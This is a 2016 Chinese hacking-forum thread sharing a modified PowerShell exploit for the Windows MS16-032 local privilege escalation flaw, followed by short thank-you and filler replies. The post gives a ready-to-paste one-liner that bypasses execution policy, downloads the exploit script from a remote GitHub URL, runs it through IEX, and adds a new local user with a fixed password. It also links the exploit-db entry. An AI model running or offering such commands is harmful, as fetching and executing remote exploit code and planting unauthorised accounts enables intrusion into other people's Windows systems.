MS16-032 windows本地提权

90_ · 发表于 2016-4-26 15:24:19

作者：Evi1cg

有个公开的powershell脚本可以进行提权。
exploit-db的详情：
https://www.exploit-db.com/exploits/39574/

试用系统：
Tested on x32 Win7, x64 Win8, x64 2k12R2
Invoke-MS16-032.ps1

示例：

为了方便使用，对这个脚本进行了简单的修改，可以执行任意程序，并可以添加参数执行（全程无弹框）脚本地址为：
Invoke-MS16-032.ps1

使用方式如下:
添加用户：

运行某程序：

远程加用户：
直接执行如下命令，可进行提权并添加用户：

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"

复制代码

演示如下

wanmznh · 发表于 2016-4-26 18:50:50

ayang · 发表于 2016-4-26 19:30:29

非常感谢

Sty，涛 · 发表于 2016-4-26 19:40:40

谢谢楼主的分享

admin1964 · 发表于 2016-4-26 20:23:12

我是来水经验的……

yusiii · 发表于 2016-4-26 21:47:07

支持中国红客联盟(ihonker.org)

r00tc4 · 发表于 2016-4-26 23:31:53

支持中国红客联盟(ihonker.org)

ljy07 · 发表于 2016-4-27 02:55:35

我是来水经验的……

xiaoqqf4 · 发表于 2016-4-27 03:28:10

谢谢楼主的分享

arctic · 发表于 2016-4-27 04:05:28

非常感谢

MS16-032 windows本地提权

指导单位

旗下站点

联系我们